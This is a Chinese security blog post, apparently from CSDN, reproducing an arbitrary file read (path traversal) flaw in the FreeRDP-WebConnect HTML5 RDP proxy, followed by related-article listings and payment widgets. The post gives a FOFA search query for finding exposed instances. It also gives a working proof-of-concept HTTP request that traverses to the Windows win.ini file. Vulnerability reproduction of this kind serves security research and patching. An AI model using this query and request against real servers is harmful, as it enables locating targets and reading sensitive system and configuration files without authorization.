FreeRDP WebConnect Url 任意文件读取漏洞复现

已于 2023-12-16 19:58:36 修改
阅读量1k 收藏 7
点赞数 11
分类专栏: 漏洞复现 文章标签: web安全 安全
于 2023-12-16 19:44:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135036425
版权
本文介绍了FreeRDP-WebConnect产品,一个开源的HTML5 RDP代理,以及其Url接口存在的任意文件读取漏洞。攻击者可利用此漏洞读取敏感文件,威胁系统安全。复现环境中通过FOFA搜索到相关实例,并提供了漏洞复现的过程及官方修复建议,包括更新修复和加强访问控制策略。
摘要由CSDN通过智能技术生成

0x01 产品简介

FreeRDP-WebConnect 是一个开源HTML5代理,它提供对使用RDP的任何Windows服务器和工作站的Web访问。

0x02 漏洞概述

FreeRDP WebConnect Url 接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:body="css/vkb.css" || body="Advanced session parameters"

0x04 漏洞复现

PoC

GET /../../../../../../../../Windows/win.ini HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
Freerdp-web
08-14
linux连接windows的rdp工具 远程桌面协议:基本的连接和图形远程规范
html5 rdp,FreeRDP HTML5 proxy on Windows
weixin_36190812的博客
06-23 874
FreeRDP-WebConnect is an open source HTML5 proxy that provides web access to any Windows server and workstation using RDP. The result is amazing, especially considering that no native client is requir...
FreeRDP 开源项目教程
最新发布
gitblog_00946的博客
08-08 649
FreeRDP 开源项目教程 FreeRDPFreeRDP is a free remote desktop protocol library and clients项目地址:https://gitcode.com/gh_mirrors/fr/FreeRDP 项目介绍 FreeRDP 是一个基于 Apache 许可证发布的开源远程桌面协议(RDP)实现。它允许用户在任何地方以他们希望的方式使用软...
远程桌面Web连接及应用
03-22
远程桌面其实可以为我们做很多事,而且不久的将来,其所发挥的作用将更大,简单地说,远 程桌面管理,就是可以让我们坐在家里就可以连接到远程电脑的桌面,可以操作远程的电脑为你做 任何事,如收发邮件了,查看报表了,进行用户管理了,进系统维护更新了, 就像实际操作那台 电脑一样。 有些第三方的软件也有很强的远程桌面的功能,如 PC Anywhere,VNC 等等。在 Windows xp 已经完全集成了远程桌面,操作也很方便,对于 Windows 2000 在 Server 版本中有终端服务器, 也可以用于远程桌面控制。 远程桌面,主要包括客户端和服务器端,每台 WINDOWS XP 都同时包括客户端和服务器端。 对于 Windows 2000 在 Server 版本中安装终端服务器既服务器端,在其它电脑中安装终端服务客户 端就可以使用了,当然最方便是时使用远程桌面的 WEB 客户端,呵呵,不需要安装任何东东,这 也是本文的主要目的。
Windows上FreeRDP-WebConnect是一个开源HTML5代理,它提供对使用RDP的任何Windows服务器和工作站的Web访问
allway2的博客
07-18 8329
Windows上的FreeRDP HTML5代理 FreeRDP-WebConnect是一个开源HTML5代理,它提供对使用RDP的任何Windows服务器和工作站的Web访问。结果是惊人的,特别是考虑到不需要本机客户端,只需一个简单的Web 浏览器即可! 平台支援 在过去的几年中,HTML5取得了长足的进步,任何主流的Web浏览器(包括移动平台)都支持WebSockets,这是FreeRDP-WebConnect所采用的基本通信机制。以下是受支持的台式机和移动浏览器的列表: 火狐...
FreeRDP-WebConnect: 一个开源的远程桌面连接工具
gitblog_00005的博客
03-16 2887
FreeRDP-WebConnect: 一个开源的远程桌面连接工具 FreeRDP-WebConnect 是一款基于 FreeRDP 的开源 Web 远程桌面客户端。它允许您通过浏览器访问远程桌面会话,而无需安装任何客户端软件。 功能特性 支持 Windows、Linux 和 macOS 操作系统。 基于 HTML5 技术,可以跨平台运行在各种现代浏览器上。 使用 FreeRDP 内核进行高效的...
html5之应用,纯web rdp 远程桌面连接
热门推荐
stonesharp的专栏
11-28 1万+
10.23补充 最近在网上找到了一个开源的web rdp引擎,可以参考一下,通过界面介绍,感觉好不错。 http://guac-dev.org/ 又找了一个开源的,试过之后感觉cpu占用率挺高的,估计没有优化好。 https://github.com/FreeRDP/FreeRDP     最近一直在琢磨如何方便部署和开发堡垒机,linux堡垒机很多地方不方便
wfreerdp-1.1_FreeRDP_
10-03
在提供的压缩包文件中,提到了"Hyper-V",这表明FreeRDP可能被用于连接到运行在Microsoft Hyper-V虚拟机上的Windows系统。Hyper-V是一个虚拟化平台,FreeRDP可以作为工具让用户在非Windows系统上远程控制Hyper-V...
myrtille:本机HTML4 / HTML5远程桌面协议客户端-开源
04-25
它与Guacamole(https://github.com/glyptodon)或FreeRDP-WebConnect(https://github.com/FreeRDP/FreeRDP-WebConnect)非常相似,不同之处在于它使用Microsoft .NET(C#)技术来获得更好的效果。与远程桌面服务...
xFreeRdp-connect:xFreeRdp simple minimal GUI
05-17
基于Python 3 Tkinter的FreeRdp的简单minimail GUI 安装说明: 准备: sudo apt-get install FreeRDP python3-tk notify-osd 克隆此项目: git clone https://github.com/xtimon/xFreeRdp-connect.git ~/....
ThinVNC - Web Remote Desktop:用于远程桌面访问HTML5客户端-开源
05-08
ThinVNC是一个Web远程访问客户端(基于浏览器HTML5)。 它是标准VNC协议的改进版本。 它涵盖了所有相同的场景,但是具有更好的性能,并且无需安装PC客户端或任何浏览器插件。 在充当“服务器”的PC或笔记本电脑上安装ThinVNC之后,只需连接Web浏览器即可。 远程访问您的桌面和文件(甚至从移动设备访问),并且就像您刚从那台计算机进入一样工作。 ThinVNC是纯Web远程访问实现(基于HTML5和AJAX)。 该网络客户端可在任何兼容HTML5的浏览器上运行,例如Chrome,Firefox,Safari,Opera,IE或Edge。 注意:此项目是Thinfinity解决方案的第一个版本。 请访问我们的网站,以找到具有RDP,应用程序发布,具有打印机和音频支持的桌面虚拟化,安全访问配置文件,MFA,Okta支持,文件传输(FTP)和其他功能的安全,功能齐全的远程访问解决方案。
Guacamole Windows替代产品Myrtille
allway2的博客
07-18 2080
Myrtille随时随地访问您的桌面 Myrtille是一种开放源代码解决方案,用于通过标准Web浏览器连接远程桌面(托管在Windows Server上)。 它是Guacamole或FreeRDP-WebConnect(适用于Linux)的Windows替代产品,主要针对系统和网络管理员(但每个人都可以使用它)。 HTTP网关使用Microsoft .NET(C#)框架,RDP连接依赖于FreeRDPFreeRDP是用C ++开发的众所周知的开源RDP客户端。 既然Microsof...
kali下利用FreeRDP进行hash登录远程桌面
crowsec
08-07 1852
在很多情况下,拿不到明文密码,由于对方机器是win2012的话,可以尝试使用hash登录RDP,看下桌面有什么东西。
FreeRDP 2.0 for Windows 编译
Karl_Schwarzschild的小窝
04-22 2755
简介 Freerdp 一个开源的RDP跨平台客户端; https://github.com/FreeRDP/FreeRDP 版本 2020-04-09 Github上其发布了2.0版本; 只下载其release版本的源代码包; 编译Windows 使用Cmake-gui进行编译前的准备, 主要流程参考Wiki,部分操作参考前人笔记; 问题解决如这个网友的日志; 使用x64 Native Tool...
connect to windows with rdp
LINUX_DING的专栏
06-18 472
原文:http://www.server-world.info/en/note?os=CentOS_6&p=x&f=5 通过安装FreeRDP,使得cenntos能通过RDP连接到windows 首先在windows中设置RDP,设置方法参见: Set Remote Desktop setting on Windows first. 1、安装FreeRDP. [root@
FreeRDP基本连接和图像规范
轻飘飞扬
11-29 7581
1.1.1  RDP简介Remote Desktop Protocol: Basic Connectivity and Graphics Remoting Specification远程桌面协议:基本的连接和图形远程规范该协议的目的是方便用户从远程计算机图形显示信息传送给用户,并从用户输入命令运送到远程计算机,输入命令在远程计算机上回放与远程计算机系统的相互作用。此协议,还提供一个可扩展的传输机制
CentOS7安装Xrdp
有生之年
04-22 448
Xrdp安装 1.安装源 yum install epel* -y 2.安装 yum -y install xrdp 3.启动和自启 systemctl start xrdp systemctl enable xrdp 4.开放端口 sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config setenforce 0 firewall-cmd --permanent --zone=public --add-port=33
sabre wp接口返回一下错误<?xml version="1.0" encoding="UTF-8"?> -<soap-env:Envelope xmlns:soap-env="http://schemas.xmlsoap.org/soap/envelope/"> -<soap-env:Header> -<eb:MessageHeader soap-env:mustUnderstand="1" eb:version="1.0" xmlns:eb="http://www.ebxml.org/namespaces/messageHeader"> -<eb:From> <eb:PartyId eb:type="URI">webservices.sabre.com</eb:PartyId> </eb:From> -<eb:To> <eb:PartyId eb:type="URI">WebConnectTraining@abacus.com.sg</eb:PartyId> </eb:To> <eb:CPAId>0R6G</eb:CPAId> <eb:ConversationId>webconnect@2023-05-28T00:02:44.1137</eb:ConversationId> <eb:Service eb:type="sabreXML">PO_PNRPricingRQ</eb:Service> <eb:Action>PO_PNRPricingRQ</eb:Action> -<eb:MessageData> <eb:MessageId>1775063235469771950</eb:MessageId> <eb:Timestamp>2023-06-02T06:32:27</eb:Timestamp> </eb:MessageData> </eb:MessageHeader> -<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/12/secext"> <wsse:BinarySecurityToken EncodingType="wsse:Base64Binary" valueType="String">Shared/IDL:IceSess\/SessMgr:1\.0.IDL/Common/!ICESMS\/RESB!ICESMSLB\/RES.LB!1685203364457!7287!297</wsse:BinarySecurityToken> </wsse:Security> </soap-env:Header> -<soap-env:Body> -<PNRPricingRS Version="1.4.4" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://webservices.sabre.com/sabreXML/2003/07"> -<Errors> <Error ErrorMessage="NO VALID TICKETING AGREEMENTS FOUND" ErrorCode="0"/> </Errors> </PNRPricingRS> </soap-env:Body> </soap-env:Envelope>
06-03
根据您提供的信息,这是一个SOAP错误响应,其中包含错误代码和错误消息。错误消息是“NO VALID TICKETING AGREEMENTS FOUND”,错误代码为“0”。这意味着没有找到有效的票务协议。您需要检查您的请求中是否存在正确...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值